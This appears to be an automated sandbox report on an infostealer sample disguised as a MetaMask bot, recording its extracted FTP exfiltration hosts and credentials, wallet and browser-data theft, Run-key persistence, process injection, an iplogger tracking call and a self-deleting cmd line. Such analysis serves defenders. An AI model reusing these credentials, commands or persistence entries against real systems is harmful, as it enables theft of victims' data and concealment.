Analysis
-
max time kernel
148s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
11-01-2023 00:41
Static task
static1
Behavioral task
behavioral1
Sample
MetaMaskBot.exe
Resource
win7-20220812-en
General
-
Target
MetaMaskBot.exe
-
Size
38KB
-
MD5
9169eb7a644bd28cbba4759b30298176
-
SHA1
ffe90ae79fd542268818deccc193c8617845acfb
-
SHA256
d97d88d757d722f0c078b4d22a5fac76bcb44db740c8b3ea9181e8733ac3c1ca
-
SHA512
cb47f0b6e74bc3c255e05ae1c5722100186be86f78df16bba166d2b1e580fa6d7bb1e22744fcd04d081dcc50a9c3580f8f85e3dca6a060cb11ef0a6e0bcfdfb5
-
SSDEEP
768:h7ra/Tl+hs3E/jU0dugZ0T2Xtz+lHQW40Zz0D3jHUpi1GouIbV:c/T2X/jN2vxZz0DTHUpouIbV
Malware Config
Extracted
Protocol: ftp- Host:
188.120.227.9 - Port:
21 - Username:
PK1 - Password:
PK1
Extracted
Protocol: ftp- Host:
79.174.12.59 - Port:
21 - Username:
hsngfb - Password:
hsnrgthearsgdt
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
pythonw.exepid process 308 pythonw.exe -
Loads dropped DLL 4 IoCs
Processes:
iexplore.exepid process 4716 iexplore.exe 4716 iexplore.exe 4716 iexplore.exe 4716 iexplore.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
pythonw.exemsedge.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\com = "C:\\Users\\Admin\\AppData\\Roaming\\pythonw.exe C:\\Users\\Admin\\AppData\\Roaming\\1680.py" pythonw.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\googl = "C:\\Users\\Admin\\AppData\\Roaming\\pythonw.exe C:\\Users\\Admin\\AppData\\Roaming\\1680.py" pythonw.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\apdate = "C:\\Users\\Admin\\AppData\\Roaming\\pythonw.exe C:\\Users\\Admin\\AppData\\Roaming\\clip.py" pythonw.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 488 4716 WerFault.exe iexplore.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
pythonw.exedescription pid process target process PID 4488 set thread context of 4716 4488 pythonw.exe iexplore.exe PID 4488 set thread context of 308 4488 pythonw.exe pythonw.exe PID 4488 set thread context of 3300 4488 pythonw.exe iexplore.exe -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\a1a310da-3131-4b6e-9efe-cf9de555f6fd.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230111014453.pma setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
iexplore.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString iexplore.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 iexplore.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3188 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
vlc.exepid process 5848 vlc.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
pythonw.exemsedge.exemsedge.exeiexplore.exeidentity_helper.exemsedge.exepid process 308 pythonw.exe 308 pythonw.exe 1636 msedge.exe 1636 msedge.exe 3140 msedge.exe 3140 msedge.exe 4716 iexplore.exe 4716 iexplore.exe 3428 identity_helper.exe 3428 identity_helper.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe 4876 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
vlc.exepid process 5848 vlc.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
msedge.exepid process 3140 msedge.exe 3140 msedge.exe 3140 msedge.exe 3140 msedge.exe 3140 msedge.exe 3140 msedge.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
Processes:
pythonw.exepythonw.exeiexplore.exedescription pid process Token: 35 4488 pythonw.exe Token: SeDebugPrivilege 308 pythonw.exe Token: SeIncreaseQuotaPrivilege 3300 iexplore.exe Token: SeSecurityPrivilege 3300 iexplore.exe Token: SeTakeOwnershipPrivilege 3300 iexplore.exe Token: SeLoadDriverPrivilege 3300 iexplore.exe Token: SeSystemProfilePrivilege 3300 iexplore.exe Token: SeSystemtimePrivilege 3300 iexplore.exe Token: SeProfSingleProcessPrivilege 3300 iexplore.exe Token: SeIncBasePriorityPrivilege 3300 iexplore.exe Token: SeCreatePagefilePrivilege 3300 iexplore.exe Token: SeBackupPrivilege 3300 iexplore.exe Token: SeRestorePrivilege 3300 iexplore.exe Token: SeShutdownPrivilege 3300 iexplore.exe Token: SeDebugPrivilege 3300 iexplore.exe Token: SeSystemEnvironmentPrivilege 3300 iexplore.exe Token: SeChangeNotifyPrivilege 3300 iexplore.exe Token: SeRemoteShutdownPrivilege 3300 iexplore.exe Token: SeUndockPrivilege 3300 iexplore.exe Token: SeManageVolumePrivilege 3300 iexplore.exe Token: SeImpersonatePrivilege 3300 iexplore.exe Token: SeCreateGlobalPrivilege 3300 iexplore.exe Token: 33 3300 iexplore.exe Token: 34 3300 iexplore.exe Token: 35 3300 iexplore.exe Token: 36 3300 iexplore.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
msedge.exevlc.exepid process 3140 msedge.exe 3140 msedge.exe 5848 vlc.exe 5848 vlc.exe 5848 vlc.exe 5848 vlc.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
vlc.exepid process 5848 vlc.exe 5848 vlc.exe 5848 vlc.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
iexplore.exevlc.exepid process 3300 iexplore.exe 5848 vlc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
MetaMaskBot.exepythonw.exemsedge.exedescription pid process target process PID 4128 wrote to memory of 4488 4128 MetaMaskBot.exe pythonw.exe PID 4128 wrote to memory of 4488 4128 MetaMaskBot.exe pythonw.exe PID 4128 wrote to memory of 4488 4128 MetaMaskBot.exe pythonw.exe PID 4488 wrote to memory of 4716 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 4716 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 4716 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 4716 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 4716 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 4716 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 4716 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 4716 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 4716 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 308 4488 pythonw.exe pythonw.exe PID 4488 wrote to memory of 308 4488 pythonw.exe pythonw.exe PID 4488 wrote to memory of 308 4488 pythonw.exe pythonw.exe PID 4488 wrote to memory of 308 4488 pythonw.exe pythonw.exe PID 4488 wrote to memory of 308 4488 pythonw.exe pythonw.exe PID 4488 wrote to memory of 308 4488 pythonw.exe pythonw.exe PID 4488 wrote to memory of 308 4488 pythonw.exe pythonw.exe PID 4488 wrote to memory of 308 4488 pythonw.exe pythonw.exe PID 4488 wrote to memory of 308 4488 pythonw.exe pythonw.exe PID 4488 wrote to memory of 3300 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 3300 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 3300 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 3300 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 3300 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 3300 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 3300 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 3300 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 3300 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 3300 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 3300 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 3300 4488 pythonw.exe iexplore.exe PID 4488 wrote to memory of 3140 4488 pythonw.exe msedge.exe PID 4488 wrote to memory of 3140 4488 pythonw.exe msedge.exe PID 3140 wrote to memory of 3852 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 3852 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MetaMaskBot.exe"C:\Users\Admin\AppData\Local\Temp\MetaMaskBot.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\pythonw.exe"pythonw.exe" "server.dll"2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Program Files (x86)\Internet Explorer\iexplore.exe" & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 19604⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\pythonw.exe"C:\Users\Admin\AppData\Roaming\pythonw.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/rsgafs3⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xdc,0x104,0x7fffcef046f8,0x7fffcef04708,0x7fffcef047184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5052 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5340 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6284 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6436 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4456 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings4⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6cd325460,0x7ff6cd325470,0x7ff6cd3254805⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4456 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1904 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1888 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7152 /prefetch:24⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4716 -ip 47161⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\MeasureEnter.avi"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\mozglue.dllFilesize
133KB
MD58f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA5120042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
C:\ProgramData\mozglue.dllFilesize
133KB
MD58f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA5120042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
C:\ProgramData\nss3.dllFilesize
1.2MB
MD5bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
C:\ProgramData\nss3.dllFilesize
1.2MB
MD5bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\CookiesFilesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web DataFilesize
112KB
MD530e375798049100677ea16b7c578a4ee
SHA1bcab7401a5f34ac0e6f795ece8d3ed12944ae99f
SHA256ea5c90cfc97f429a2f9e0b1e9b16778b5b19bd8e83a896a30002de70af84e1ce
SHA512f8ae930e26ecfe06dc30d4f39858b0eec6b4a81a8139883712505b5c6b58504d463d986ef58c7151a247fe157c6013b570b9d39e1d4a860061e37e0419900582
-
C:\Users\Admin\AppData\Roaming\pythonw.exeFilesize
94KB
MD509e1729b0917b448f60e9520f8b6c844
SHA1ac1fe5c308fa4f9c94657a10eae83d55f89d66ac
SHA256333aa54b7532b181164520f69a680eaee344c2f483a02239898a64126d26a6d9
SHA5124e3abc2167c9a138c0128beff1ad2543374c82b157afba6ffa8a2d3ab07a662a5cec0997912343375327b51d5d50f126e1a47dcfdcbd8f356d73f390f7584b67
-
\??\pipe\LOCAL\crashpad_3140_OWKOKZMTPSRBCOAAMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/308-139-0x0000000005BF0000-0x0000000006194000-memory.dmpFilesize
5.6MB
-
memory/308-138-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/308-142-0x0000000005750000-0x000000000585A000-memory.dmpFilesize
1.0MB
-
memory/308-143-0x0000000005640000-0x000000000567C000-memory.dmpFilesize
240KB
-
memory/308-175-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/308-140-0x00000000067C0000-0x0000000006DD8000-memory.dmpFilesize
6.1MB
-
memory/308-146-0x0000000005AB0000-0x0000000005B42000-memory.dmpFilesize
584KB
-
memory/308-147-0x0000000005B50000-0x0000000005BB6000-memory.dmpFilesize
408KB
-
memory/308-166-0x0000000007570000-0x000000000758E000-memory.dmpFilesize
120KB
-
memory/308-141-0x0000000002EA0000-0x0000000002EB2000-memory.dmpFilesize
72KB
-
memory/308-137-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/308-152-0x0000000007A40000-0x0000000007A90000-memory.dmpFilesize
320KB
-
memory/308-153-0x0000000007B10000-0x0000000007B86000-memory.dmpFilesize
472KB
-
memory/308-134-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/308-156-0x0000000007F80000-0x0000000008142000-memory.dmpFilesize
1.8MB
-
memory/308-157-0x0000000008680000-0x0000000008BAC000-memory.dmpFilesize
5.2MB
-
memory/308-133-0x0000000000000000-mapping.dmp
-
memory/308-136-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/780-159-0x0000000000000000-mapping.dmp
-
memory/1132-161-0x0000000000000000-mapping.dmp
-
memory/1468-174-0x0000000000000000-mapping.dmp
-
memory/1636-150-0x0000000000000000-mapping.dmp
-
memory/1736-149-0x0000000000000000-mapping.dmp
-
